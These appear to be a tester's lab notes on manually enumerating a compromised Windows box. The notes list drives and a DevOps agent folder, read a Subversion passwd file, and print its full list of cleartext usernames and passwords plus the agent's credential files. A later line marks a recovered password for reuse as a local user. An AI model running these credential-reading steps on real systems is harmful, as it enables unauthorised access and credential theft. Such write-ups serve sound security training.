10 box manual enum

c:\Users>dir
Directory of c:\Users
2020-07-07  17:53    <DIR>          .
2020-07-07  17:53    <DIR>          ..
2020-03-28  15:59    <DIR>          .NET v4.5
2020-03-28  15:59    <DIR>          .NET v4.5 Classic
2020-08-18  00:33    <DIR>          Administrator
2021-09-23  21:32    <DIR>          Public
2020-07-22  01:11    <DIR>          restorer
2020-07-08  19:22    <DIR>          robisl
# cannot enter any of the user directories; access denied on each

# W:\ showed up in the output of PEAS and other PE (privilege-escalation) scripts
# listing all attached drives to confirm
c:\Users\Public>wmic logicaldisk get deviceid, volumename, description
Description       DeviceID  VolumeName
Local Fixed Disk  C:
Local Fixed Disk  W:        Work
[OR]
c:\Users\Public>fsutil fsinfo drives
Drives: C:\ W:\
# PowerShell equivalent: powershell -c get-psdrive -psprovider filesystem

w:\>dir
Directory of w:\
2020-06-16  18:59    <DIR>          agents
2020-03-28  15:57    <DIR>          AzureDevOpsData
2020-04-03  11:31    <DIR>          sites
2020-06-20  16:04    <DIR>          svnrepos

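# found the path W:\svnrepos\www\conf\passwd referenced in p.ps1
# (svnserve passwd file: credentials are kept in cleartext, so anyone who can read the file gets every account)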
# default is: W:\svnrepos\www\conf>more authz

W:\agents\agent01>more W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
# exploring W:\agents\
W:\agents\agent01>dir /a
dir /a
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\agents\agent01

2020-04-02  22:05    <DIR>          .
2020-04-02  22:05    <DIR>          ..
2020-04-02  22:05               163 .agent
2020-04-02  22:05               241 .credentials
2020-04-02  22:05             1894 .credentials_rsaparams
2020-04-02  22:05                32 .service
2020-04-02  22:05    <SYMLINKD>     bin [w:\agents\agentbase\bin]
2020-04-02  22:05    <SYMLINK>      config.cmd [w:\agents\agentbase\config.cmd]
2020-04-02  22:05    <SYMLINKD>     externals [w:\agents\agentbase\externals]
2020-04-02  22:05    <SYMLINK>      run.cmd [w:\agents\agentbase\run.cmd]
2021-09-23  22:24    <DIR>          _diag
2021-09-23  22:24    <DIR>          _work
               6 File(s)          2330 bytes
			   
W:\agents\agent01>more .agent
more .agent
{
  "agentId": 1,
  "agentName": "Hamilton01",
  "poolId": 1,
  "poolName": "Default",
  "serverUrl": "http://127.0.0.1:8080/",
  "workFolder": "_work"
}

W:\agents\agent01>more .credentials
more .credentials
{
  "scheme": "OAuth",
  "data": {
    "clientId": "0835e5a8-1280-4512-82ea-366912d1fd5a",
    "authorizationUrl": "http://127.0.0.1:8080/_apis/oauth2/token",
    "oauthEndpointUrl": "http://127.0.0.1:8080/_apis/oauth2/token"
  }
}

# looking more closely at the passwords: we got a password for robisl,
# who is also a local user on the box (has a profile directory under c:\Users)
